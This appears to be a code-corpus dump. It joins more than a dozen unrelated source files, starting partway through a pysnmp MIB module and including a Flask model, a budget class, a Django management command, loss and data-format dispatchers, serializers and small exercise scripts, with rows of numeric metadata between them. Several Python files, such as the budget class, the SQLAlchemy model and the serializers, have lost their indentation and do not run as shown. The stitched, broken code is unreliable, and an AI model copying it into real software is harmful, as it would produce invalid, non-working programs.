rlIpmFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInReceives.setStatus('current')
rlIpmFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftForwDatagrams.setStatus('current')
rlIpmFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInDiscards.setStatus('current')
mibBuilder.exportSymbols("RADLAN-rlFft", rlIpxFftStnDstNode=rlIpxFftStnDstNode, rlIpmFftSrcIpMask=rlIpmFftSrcIpMask, rlIpFftSubNextHopIpAddr5=rlIpFftSubNextHopIpAddr5, rlIpFftNextHopVid=rlIpFftNextHopVid, rlIpxFftNumIndex=rlIpxFftNumIndex, rlIpmFftIndex=rlIpmFftIndex, rlIpmFftRouterAgingTimeout=rlIpmFftRouterAgingTimeout, rlIpmFftInReceives=rlIpmFftInReceives, rlIpFftSubTable=rlIpFftSubTable, rlIpFftL2InfoIfindex=rlIpFftL2InfoIfindex, rlIpmFftMibVersion=rlIpmFftMibVersion, rlIpmFftTable=rlIpmFftTable, rlIpxFftStnDstMacAddress=rlIpxFftStnDstMacAddress, rlIpxFftCountersTable=rlIpxFftCountersTable, rlIpFftYellowBoundary=rlIpFftYellowBoundary, rlIpmFftInDiscards=rlIpmFftInDiscards, rlIpxFftStnFacsIndex=rlIpxFftStnFacsIndex, rlIpmFftInportAction=rlIpmFftInportAction, rlIpFftSubEntry=rlIpFftSubEntry, rlIpFftSubNextHopIpAddr1=rlIpFftSubNextHopIpAddr1, rlIpFftL2InfoOutIfIndex=rlIpFftL2InfoOutIfIndex, rlIpFftNextHopEntry=rlIpFftNextHopEntry, rlIpFftStnDstIpAddrType=rlIpFftStnDstIpAddrType, rlIpMaxFftNumber=rlIpMaxFftNumber, rlIpxFftSubAge=rlIpxFftSubAge, rlIpxFftStnSrcMacAddress=rlIpxFftStnSrcMacAddress, rlIpmFftCountersTable=rlIpmFftCountersTable, rlIpFftCountersTable=rlIpFftCountersTable, rlIpFftAgingTimeSupported=rlIpFftAgingTimeSupported, rlIpxFftForwDatagrams=rlIpxFftForwDatagrams, rlIpxFftUnknownAddrMsgUsed=rlIpxFftUnknownAddrMsgUsed, rlIpmFFT=rlIpmFFT, rlIpFftForwDatagrams=rlIpFftForwDatagrams, rlIpmMaxFftNumber=rlIpmMaxFftNumber, rlIpmFftNumIndex=rlIpmFftNumIndex, rlIpFftStnTable=rlIpFftStnTable, rlIpFftNextHopMacAddress=rlIpFftNextHopMacAddress, rlIpmFftPortTagTable=rlIpmFftPortTagTable, rlIpxFftSubSrcMacAddress=rlIpxFftSubSrcMacAddress, rlIpmFftInputIfIndex=rlIpmFftInputIfIndex, rlIpmFftForwDatagrams=rlIpmFftForwDatagrams, rlIpFftStnIndex=rlIpFftStnIndex, rlFFT=rlFFT, rlIpFftNumEntry=rlIpFftNumEntry, rlIpFftL2InfoEntry=rlIpFftL2InfoEntry, rlIpFftSubNextHopIfindex4=rlIpFftSubNextHopIfindex4, rlIpxFftNumTable=rlIpxFftNumTable, rlIpFftRedBoundary=rlIpFftRedBoundary, 
rlIpxFftStnEntry=rlIpxFftStnEntry, rlIpmFftAge=rlIpmFftAge, rlIpmFftPortOutputifIndex=rlIpmFftPortOutputifIndex, rlIpFftSubNextHopIfindex1=rlIpFftSubNextHopIfindex1, rlIpxFftMibVersion=rlIpxFftMibVersion, rlIpFftSubNextHopIfindex7=rlIpFftSubNextHopIfindex7, rlIpxFftSubFacsIndex=rlIpxFftSubFacsIndex, rlIpmFftNumRoutesNumber=rlIpmFftNumRoutesNumber, rlIpxFftCountersIndex=rlIpxFftCountersIndex, rlIpFftNumStnRoutesNumber=rlIpFftNumStnRoutesNumber, rlIpFftSubNextHopIpAddr2=rlIpFftSubNextHopIpAddr2, rlIpFftSubNextHopIfindex2=rlIpFftSubNextHopIfindex2, rlIpFftNextHopValid=rlIpFftNextHopValid, rlIpxFftAgingTimeSupported=rlIpxFftAgingTimeSupported, rlIpmFftNumTable=rlIpmFftNumTable, NetNumber=NetNumber, rlIpFftL2InfoReferenceCount=rlIpFftL2InfoReferenceCount, rlIpxFftCountersEntry=rlIpxFftCountersEntry, rlIpFftStnDstMacAddress=rlIpFftStnDstMacAddress, rlIpFftNextHopTable=rlIpFftNextHopTable, rlIpFftL2InfoVid=rlIpFftL2InfoVid, rlIpmFftPortIndex=rlIpmFftPortIndex, rlIpFftL2InfoTable=rlIpFftL2InfoTable, rlIpFftSubNextHopIfindex6=rlIpFftSubNextHopIfindex6, rlIpxFftInDiscards=rlIpxFftInDiscards, rlIpFftCountersEntry=rlIpFftCountersEntry, rlIpFftStnTaggedMode=rlIpFftStnTaggedMode, rlIpmFftUserAgingTimeout=rlIpmFftUserAgingTimeout, rlIpFftStnSrcMacAddress=rlIpFftStnSrcMacAddress, rlIpFftSubNextHopIpAddr3=rlIpFftSubNextHopIpAddr3, rlIpmFftSrcIpAddress=rlIpmFftSrcIpAddress, rlIpFftSubNextHopIpAddr6=rlIpFftSubNextHopIpAddr6, rlIpxFftStnSrcNetid=rlIpxFftStnSrcNetid, rlIpFftNextHopifindex=rlIpFftNextHopifindex, rlIpxFftNumSubRoutesNumber=rlIpxFftNumSubRoutesNumber, rlIpxFftSubOutIfIndex=rlIpxFftSubOutIfIndex, rlIpFftSrcAddrSupported=rlIpFftSrcAddrSupported, rlIpFftSubnetSupported=rlIpFftSubnetSupported, rlIpxFftStnEncapsulation=rlIpxFftStnEncapsulation, rlIpxMaxFftNumber=rlIpxMaxFftNumber, rlIpxFftSubTci=rlIpxFftSubTci, rlIpmFftPortDstIpAddress=rlIpmFftPortDstIpAddress, rlIpFftStnEntry=rlIpFftStnEntry, rlIpxFftSubDstNetid=rlIpxFftSubDstNetid, rlIpFftInDiscards=rlIpFftInDiscards, 
rlIpFftNextHopOutIfIndex=rlIpFftNextHopOutIfIndex, rlIpxFftStnTci=rlIpxFftStnTci, rlIpmFftCountersIndex=rlIpmFftCountersIndex, rlIpFftAgingTimeout=rlIpFftAgingTimeout, rlIpFftStnAge=rlIpFftStnAge, rlIpFftL2InfoTaggedMode=rlIpFftL2InfoTaggedMode, rlIpxFFT=rlIpxFFT, rlIpFftUnknownAddrMsgUsed=rlIpFftUnknownAddrMsgUsed, rlIpFftSubNextHopCount=rlIpFftSubNextHopCount, rlIpFftSubNextHopIpAddr8=rlIpFftSubNextHopIpAddr8, rlIpFftSubMrid=rlIpFftSubMrid, rlIpFftInReceives=rlIpFftInReceives, rlIpmFftPortTagEntry=rlIpmFftPortTagEntry, rlIpFftL2InfoSrcMacAddress=rlIpFftL2InfoSrcMacAddress, rlIpFftStnDstIpAddress=rlIpFftStnDstIpAddress, rlIpmFftPortSrcIpAddress=rlIpmFftPortSrcIpAddress, rlIpFftStnOutIfIndex=rlIpFftStnOutIfIndex, rlIpFftSubAge=rlIpFftSubAge, rlIpxFftYellowBoundary=rlIpxFftYellowBoundary, rlIpxFftStnSrcNode=rlIpxFftStnSrcNode, rlIpxFftStnDstIpxAddrType=rlIpxFftStnDstIpxAddrType, rlIpFftNumSubRoutesNumber=rlIpFftNumSubRoutesNumber, rlIpFftSubNextHopSetRefCount=rlIpFftSubNextHopSetRefCount, rlIpxFftNumStnRoutesNumber=rlIpxFftNumStnRoutesNumber, rlIpxFftRedBoundary=rlIpxFftRedBoundary, rlIpFftDynamicSupported=rlIpFftDynamicSupported, rlIpFftNextHopIpAddress=rlIpFftNextHopIpAddress, rlIpmFftEntry=rlIpmFftEntry, rlIpxFftStnIndex=rlIpxFftStnIndex, rlIpxFftDynamicSupported=rlIpxFftDynamicSupported, rlIpmFftUnknownAddrMsgUsed=rlIpmFftUnknownAddrMsgUsed, rlIpFftStnDstRouteIpMask=rlIpFftStnDstRouteIpMask, rlIpFftNumIndex=rlIpFftNumIndex, rlIpFftCountersIndex=rlIpFftCountersIndex, rlIpmFftDstIpAddress=rlIpmFftDstIpAddress, rlIpFftNumTable=rlIpFftNumTable, rlIpFftSubNextHopIfindex5=rlIpFftSubNextHopIfindex5, rlIpxFftInReceives=rlIpxFftInReceives, rlIpFftL2InfoType=rlIpFftL2InfoType, rlIpFftL2InfoDstMacAddress=rlIpFftL2InfoDstMacAddress, rlIpFftSubNextHopIpAddr7=rlIpFftSubNextHopIpAddr7, rlIpxFftStnAge=rlIpxFftStnAge, rlIpFftMibVersion=rlIpFftMibVersion, rlIpFftSubDstIpMask=rlIpFftSubDstIpMask, rlIpxFftNumEntry=rlIpxFftNumEntry, 
rlIpFftNextHopReferenceCount=rlIpFftNextHopReferenceCount, rlIpxFftNetworkSupported=rlIpxFftNetworkSupported, rlIpxFftStnTable=rlIpxFftStnTable, rlIpFftNextHopType=rlIpFftNextHopType, rlIpmFftCountersEntry=rlIpmFftCountersEntry, rlIpmFftPortOutputTag=rlIpmFftPortOutputTag, rlIpmFftInputVlanTag=rlIpmFftInputVlanTag, rlIpFFT=rlIpFFT, rlIpxFftSubEncapsulation=rlIpxFftSubEncapsulation, rlIpFftSubNextHopIfindex3=rlIpFftSubNextHopIfindex3, rlIpxFftSubTable=rlIpxFftSubTable, rlIpFftL2InfoValid=rlIpFftL2InfoValid, rlIpmFftDynamicSupported=rlIpmFftDynamicSupported, rlIpxFftSubEntry=rlIpxFftSubEntry, rlIpxFftSubIndex=rlIpxFftSubIndex, Percents=Percents, rlIpFftStnMrid=rlIpFftStnMrid, rlIpFftSubNextHopIfindex8=rlIpFftSubNextHopIfindex8, rlIpxFftStnOutIfIndex=rlIpxFftStnOutIfIndex, rlIpmFftForwardAction=rlIpmFftForwardAction, rlIpFftSubNextHopIpAddr4=rlIpFftSubNextHopIpAddr4, rlIpxFftAgingTimeout=rlIpxFftAgingTimeout, rlIpxFftSrcAddrSupported=rlIpxFftSrcAddrSupported, PYSNMP_MODULE_ID=rlFFT, rlIpFftSubDstIpSubnet=rlIpFftSubDstIpSubnet, rlIpFftNextHopNetAddress=rlIpFftNextHopNetAddress, rlIpxFftSubDstMacAddress=rlIpxFftSubDstMacAddress, rlIpmFftNumEntry=rlIpmFftNumEntry, rlIpFftStnVid=rlIpFftStnVid, rlIpxFftStnDstNetid=rlIpxFftStnDstNetid)
# ---- 89898.py (zhangbo2008/Reinforcement-learning-with-tensorflow, MIT) ----
a = 1
for i in range(325):
    a = a * 0.1
    print(a)  # the values shrink each pass and eventually underflow to 0.0
# ---- services/nris-api/backend/app/nris/models/legislation_act_section.py (parc-jason/mds, Apache-2.0) ----
from datetime import datetime
from app.extensions import db, api
from flask_restplus import fields
from sqlalchemy.orm import validates
from app.nris.utils.base_model import Base
class LegislationActSection(Base):
__tablename__ = "legislation_act_section"
__table_args__ = {
'comment': 'Contains a list of sections (or provisions of the act); i.e. "1.9.1", "1.5.1", etc.'}
legislation_act_section_id = db.Column(db.Integer, primary_key=True)
legislation_act_id = db.Column(db.Integer,
db.ForeignKey('legislation_act.legislation_act_id'))
section = db.Column(db.String(64))
def __repr__(self):
return f'<LegislationActSection legislation_act_section_id={self.legislation_act_section_id} section={self.section}>'
| 41.526316 | 125 | 0.726236 | 106 | 789 | 5.103774 | 0.509434 | 0.181146 | 0.155268 | 0.127542 | 0.07024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012308 | 0.176172 | 789 | 18 | 126 | 43.833333 | 0.82 | 0 | 0 | 0 | 0 | 0.066667 | 0.321926 | 0.205323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0.066667 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
# ---- budget.py (marianne-manaog/Budget_App, MIT) ----
# This Python file contains a 'Budget' class that can be used to instantiate objects
# based on different budget categories, such as food, clothing, and entertainment.
# These objects allow for depositing and withdrawing funds from each category,
# as well as computing category balances.
from typing import List
# TODO: Add class' and methods' docstrings
# TODO: Implement method to transfer balance amounts between categories.
# TODO: Add unit tests for class' methods
class Budget:
def __init__(self, balance: float, category: str, ledger: List):
self.balance = balance
self.category = category
self.ledger = ledger
def __repr__(self):
return f"The budget for {self.category} has £{self.balance} remaining."
def deposit(self, deposit_amount: float, description: str):
self.balance += deposit_amount
self.ledger.append({"amount": deposit_amount, "description": description})
return self.balance, self.category
def withdraw(self, withdraw_amount: float, description: str):
if withdraw_amount <= self.balance:
self.balance -= withdraw_amount
self.ledger.append({"amount": withdraw_amount, "description": description})
else:
            raise Exception("Insufficient amount to withdraw.")
return self.balance, self.category
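Since the TODOs above mention unit tests, here is a minimal usage sketch of the `Budget` class; the category name and amounts are illustrative, and the class is restated in condensed form so the snippet runs on its own:

```python
from typing import List


class Budget:  # condensed restatement of the class above so this snippet is standalone
    def __init__(self, balance: float, category: str, ledger: List):
        self.balance = balance
        self.category = category
        self.ledger = ledger

    def __repr__(self):
        return f"The budget for {self.category} has £{self.balance} remaining."

    def deposit(self, deposit_amount: float, description: str):
        self.balance += deposit_amount
        self.ledger.append({"amount": deposit_amount, "description": description})
        return self.balance, self.category

    def withdraw(self, withdraw_amount: float, description: str):
        if withdraw_amount <= self.balance:
            self.balance -= withdraw_amount
            self.ledger.append({"amount": withdraw_amount, "description": description})
        else:
            raise Exception("Insufficient amount to withdraw.")
        return self.balance, self.category


food = Budget(balance=0.0, category="food", ledger=[])
food.deposit(100.0, "weekly groceries budget")
food.withdraw(25.5, "supermarket run")
print(food)  # The budget for food has £74.5 remaining.
```

Each deposit and withdrawal is also appended to the ledger, so the transaction history can be inspected after the fact.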
# ---- src/zope/app/server/tests/test_schema.py (zopefoundation/zope.app.server, ZPL-2.1) ----
##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test that the Zope appserver configuration schema can be loaded.
"""
import os.path
import unittest
import ZConfig
class TestConfiguration(unittest.TestCase):
def test_schema(self):
dir = os.path.dirname(os.path.dirname(__file__))
filename = os.path.join(dir, "schema.xml")
ZConfig.loadSchema(filename)
# ---- lang/Python/binary-strings-2.py (ethansaxenian/RosettaDecode, MIT) ----
s = "Hello "
t = "world!"
u = s + t # + concatenates
# ---- 2019_Challenges/Week 03-07/DoJoChallenge 03-07.py (cohpy/DoJo-Challenges, MIT) ----
"""
Given an array of numbers representing the stock prices of a company in
chronological order, write a function that calculates the maximum profit you
could have made from buying and selling that stock once. You must buy before
you can sell it.
For example, given [9, 11, 8, 5, 7, 10], you should return 5, since you
could buy the stock at 5 dollars and sell it at 10 dollars.
"""
| 34.909091 | 76 | 0.755208 | 70 | 384 | 4.142857 | 0.671429 | 0.055172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03871 | 0.192708 | 384 | 10 | 77 | 38.4 | 0.896774 | 0.973958 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
# ---- nautobot_version_control/management/commands/cleanup_data.py (tim-fiola/nautobot-plugin-version-control, Apache-2.0) ----
"""cleanup_data.py."""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from nautobot.extras.models import Status
class Command(BaseCommand):
"""Cleanup Database after migrations."""
help = "Cleanup Database after migrations."
def handle(self, *args, **kwargs):
"""override handle."""
Status.objects.all().delete()
ContentType.objects.all().delete()
Permission.objects.all().delete()
| 27.3 | 58 | 0.712454 | 61 | 546 | 6.360656 | 0.557377 | 0.07732 | 0.123711 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161172 | 546 | 19 | 59 | 28.736842 | 0.847162 | 0.124542 | 0 | 0 | 0 | 0 | 0.073593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
# ---- wilds/examples/losses.py (itsjohnward/wilds, MIT) ----
import torch.nn as nn
from wilds.common.metrics.loss import ElementwiseLoss, Loss, MultiTaskLoss
from wilds.common.metrics.all_metrics import MSE
def initialize_loss(config, d_out):
    # Look up the configured loss name once instead of calling config.get()
    # in every branch.
    loss_function = config.get('loss_function')
    if loss_function == 'cross_entropy':
        return ElementwiseLoss(loss_fn=nn.CrossEntropyLoss(reduction='none'))
    elif loss_function == 'lm_cross_entropy':
        return MultiTaskLoss(loss_fn=nn.CrossEntropyLoss(reduction='none'))
    elif loss_function == 'mse':
        return MSE(name='loss')
    elif loss_function == 'multitask_bce':
        return MultiTaskLoss(loss_fn=nn.BCEWithLogitsLoss(reduction='none'))
    elif loss_function == 'fasterrcnn_criterion':
        from models.detection.fasterrcnn import FasterRCNNLoss
        return ElementwiseLoss(loss_fn=FasterRCNNLoss(config.get('device')))
    else:
        raise ValueError(f'loss_function {loss_function!r} not recognized')
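The chain of `elif` branches in `initialize_loss` could also be written as a lookup table. A torch-free sketch of that pattern follows; the factory names and string values are illustrative, not the WILDS API:

```python
# Hypothetical dispatch table mirroring the structure of initialize_loss above.
LOSS_FACTORIES = {
    'mse': lambda: 'MSE loss',
    'cross_entropy': lambda: 'cross-entropy loss',
    'multitask_bce': lambda: 'multitask BCE loss',
}

def initialize_loss_sketch(config):
    name = config.get('loss_function')
    try:
        return LOSS_FACTORIES[name]()  # look up and build the requested loss
    except KeyError:
        raise ValueError(f'loss_function {name!r} not recognized')

print(initialize_loss_sketch({'loss_function': 'mse'}))  # MSE loss
```

A table keeps adding a new loss to a one-line registration, at the cost of losing the branch-local import that the `fasterrcnn_criterion` case relies on.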
# ---- tutorials/W0D3_LinearAlgebra/solutions/W0D3_Tutorial1_Solution_ff7c6b75.py (sjbabdi/course-content, CC-BY-4.0 / BSD-3-Clause) ----
# 1) They are linearly dependent as one can be formed as a linear combination of
# the others (a + b = c). You could also have known this because you have four
#. 3D vectors. You don't need 4 vectors to get anywhere in 3D space!
#.
# 2) The span of a, b, c, and d is all of 3D space (R^3).
# 3) The span of a and b is a 1D line through 3D space (note this is not R^1)
# 4) The span of a and b is a 2d plane through 3D space (note this is not R^2) | 45.6 | 82 | 0.675439 | 100 | 456 | 3.08 | 0.52 | 0.090909 | 0.087662 | 0.097403 | 0.292208 | 0.292208 | 0.292208 | 0.292208 | 0 | 0 | 0 | 0.04386 | 0.25 | 456 | 10 | 83 | 45.6 | 0.856725 | 0.962719 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
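The claims above can be checked numerically with matrix rank. The exercise's actual vectors are not reproduced here, so the snippet below uses illustrative 3D vectors chosen to have the same a + b = c dependence:

```python
import numpy as np

# Illustrative vectors (hypothetical, chosen so that a + b = c as in answer 1).
a = np.array([1.0, 0.0, 0.0])
b = np.array([0.0, 1.0, 0.0])
c = a + b
d = np.array([0.0, 0.0, 1.0])

print(np.linalg.matrix_rank(np.stack([a, b, c, d])))  # 3: the four vectors span R^3
print(np.linalg.matrix_rank(np.stack([a, b])))        # 2: a and b span a plane
print(np.linalg.matrix_rank(np.stack([a])))           # 1: a alone spans a line
```

The rank of the stacked matrix equals the dimension of the span, so rank 3 for four 3D vectors confirms both the dependence and that they fill all of R^3.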
# ---- client-tutorial/client_tutorial/ReportsDao.py (dixonwhitmire/connect-clients, Apache-2.0) ----
# Copyright (c) 2021 IBM Corporation
# Henry Feldman, MD (CMO Development, IBM Watson Health)
from databaseUtil import DatabaseUtil
from typing import List
from database_classes import RadiologyReport, EKGReport
class ReportsDao:
"""
the collection of methods to fetch report entities (radiology, EKG...) from the database
"""
session = None
def __init__(self):
"""
setup and fetch the database session from the database utility.
"""
dbUtil = DatabaseUtil()
self.session = dbUtil.getSession()
def getAllRadiologyReports(self)->List[RadiologyReport]:
"""
gets the list of radiology reports out of the database
@return: radiologyReportsList
@rtype: List[RadiologyReport]
"""
return self.session.query(RadiologyReport).all()
def getRadiologyReportsForPatient(self,subjectId:int)->List[RadiologyReport]:
"""
        gets the list of radiology reports out of the database for a specific patient by their subject id
        @param subjectId: the patient's subject id
        @type subjectId: int
@return: radiologyReportsList
@rtype: List[RadiologyReport]
"""
return self.session.query(RadiologyReport).filter(RadiologyReport.SUBJECT_ID==subjectId).all()
def getAllEKGReports(self)->List[EKGReport]:
"""
gets the list of EKG reports out of the database
@return: ekgReports
@rtype: List[EKGReport]
"""
return self.session.query(EKGReport).all()
def getAllEKGReportsForPatient(self,subjectId:int) -> List[EKGReport]:
"""
        gets the list of EKG reports out of the database for a specific patient by their subject id
@return: ekgReports
@rtype: List[EKGReport]
"""
return self.session.query(EKGReport).filter(EKGReport.SUBJECT_ID==subjectId).all()
# ---- detools/data_format/__init__.py (advmach/detools, BSD-2-Clause) ----
from collections import defaultdict
from operator import itemgetter
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
from ..errors import Error
from ..common import DATA_FORMAT_AARCH64
from ..common import DATA_FORMAT_ARM_CORTEX_M4
from ..common import DATA_FORMAT_XTENSA_LX106
from ..common import format_bad_data_format
from ..common import format_bad_data_format_number
from . import aarch64
from . import arm_cortex_m4
from . import xtensa_lx106
def encode(ffrom, fto, data_format, data_segment):
"""Returns the new from-data and to-data, along with a patch that can
be used to convert the new from-data to the original to-data later
(by the diff and from readers).
"""
if data_format == 'aarch64':
return aarch64.encode(ffrom, fto, data_segment)
elif data_format == 'arm-cortex-m4':
return arm_cortex_m4.encode(ffrom, fto, data_segment)
elif data_format == 'xtensa-lx106':
return xtensa_lx106.encode(ffrom, fto, data_segment)
else:
raise Error(format_bad_data_format(data_format))
def create_readers(data_format, ffrom, patch, to_size):
"""Returns diff and from readers, used when applying a patch.
"""
if data_format == DATA_FORMAT_AARCH64:
return aarch64.create_readers(ffrom, patch, to_size)
elif data_format == DATA_FORMAT_ARM_CORTEX_M4:
return arm_cortex_m4.create_readers(ffrom, patch, to_size)
elif data_format == DATA_FORMAT_XTENSA_LX106:
return xtensa_lx106.create_readers(ffrom, patch, to_size)
else:
raise Error(format_bad_data_format_number(data_format))
def info(data_format, patch, fsize):
"""Returns an info string.
"""
if data_format == DATA_FORMAT_AARCH64:
return aarch64.info(patch, fsize)
elif data_format == DATA_FORMAT_ARM_CORTEX_M4:
return arm_cortex_m4.info(patch, fsize)
elif data_format == DATA_FORMAT_XTENSA_LX106:
return xtensa_lx106.info(patch, fsize)
else:
raise Error(format_bad_data_format_number(data_format))
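All three functions above repeat the same if/elif dispatch over the data format. A table-driven alternative centralizes the format list in one dict; the sketch below uses stand-in handler stubs and a stand-in `Error` class rather than the real detools modules.

```python
class Error(Exception):
    # Stand-in for detools' Error.
    pass

def encode_aarch64(ffrom, fto, seg):
    return "aarch64-patch"   # stub handler for illustration

def encode_xtensa(ffrom, fto, seg):
    return "xtensa-patch"    # stub handler for illustration

# One table replaces the repeated if/elif chain.
_ENCODERS = {
    'aarch64': encode_aarch64,
    'xtensa-lx106': encode_xtensa,
}

def encode(ffrom, fto, data_format, data_segment):
    try:
        encoder = _ENCODERS[data_format]
    except KeyError:
        raise Error("Unsupported data format {}.".format(data_format))
    return encoder(ffrom, fto, data_segment)

print(encode(None, None, 'aarch64', None))  # aarch64-patch
```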
| 33.047619 | 73 | 0.741114 | 298 | 2,082 | 4.895973 | 0.204698 | 0.198766 | 0.060315 | 0.095956 | 0.611378 | 0.508568 | 0.488691 | 0.398903 | 0.275531 | 0.249486 | 0 | 0.028219 | 0.182997 | 2,082 | 62 | 74 | 33.580645 | 0.829512 | 0.121998 | 0 | 0.275 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.325 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f7ffa73921d29299350bfec3addf3379899c9441 | 791 | py | Python | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from biodata.api import models as m
COMMON_FIELDS = ['kf_id', 'created', 'modified']
class StudySerializer(serializers.ModelSerializer):
class Meta:
model = m.Study
fields = COMMON_FIELDS + ['name', 'short_name', 'participants']
read_only_fields = ['participants']
class ParticipantSerializer(serializers.ModelSerializer):
class Meta:
model = m.Participant
fields = COMMON_FIELDS + [
'gender', 'race', 'ethnicity', 'study', 'biospecimens',
]
read_only_fields = ['biospecimens']
class BiospecimenSerializer(serializers.ModelSerializer):
class Meta:
model = m.Biospecimen
fields = COMMON_FIELDS + [
'analyte_type', 'participant',
]
| 28.25 | 71 | 0.653603 | 74 | 791 | 6.824324 | 0.5 | 0.09505 | 0.184158 | 0.207921 | 0.243564 | 0.243564 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240202 | 791 | 27 | 72 | 29.296296 | 0.840266 | 0 | 0 | 0.238095 | 0 | 0 | 0.163085 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7909a898d4e7c6b67303f014f5cd22ed7fddf740 | 222 | py | Python | Hackerrank/Practice/Python/9.erros and exceptions/66.Incorrect Regex.py | kushagra1212/Competitive-Programming | 5b68774c617d6abdf1b29893b1b13d47f62161e8 | [
"MIT"
] | 994 | 2017-02-28T06:13:47.000Z | 2022-03-31T10:49:00.000Z | Hackerrank_python/9.erros and exceptions/66.Incorrect Regex.py | devesh17m/Competitive-Programming | 2d459dc8dc5ac628d94700b739988b0ea364cb71 | [
"MIT"
] | 16 | 2018-01-01T02:59:55.000Z | 2021-11-22T12:49:16.000Z | Hackerrank_python/9.erros and exceptions/66.Incorrect Regex.py | devesh17m/Competitive-Programming | 2d459dc8dc5ac628d94700b739988b0ea364cb71 | [
"MIT"
] | 325 | 2017-06-15T03:32:43.000Z | 2022-03-28T22:43:42.000Z | # Enter your code here. Read input from STDIN. Print output to STDOUT
import re
for _ in range(int(input())):
try:
re.compile(input())
print(True)
except re.error:
print(False)
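The try/except check above can be wrapped as a reusable predicate, which is easier to test than the print-based version:

```python
import re

def is_valid_regex(pattern: str) -> bool:
    """Return True if the pattern compiles, False otherwise."""
    try:
        re.compile(pattern)
        return True
    except re.error:
        return False

print(is_valid_regex(r".*\d+"))  # True
print(is_valid_regex("*"))       # False ("nothing to repeat")
```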
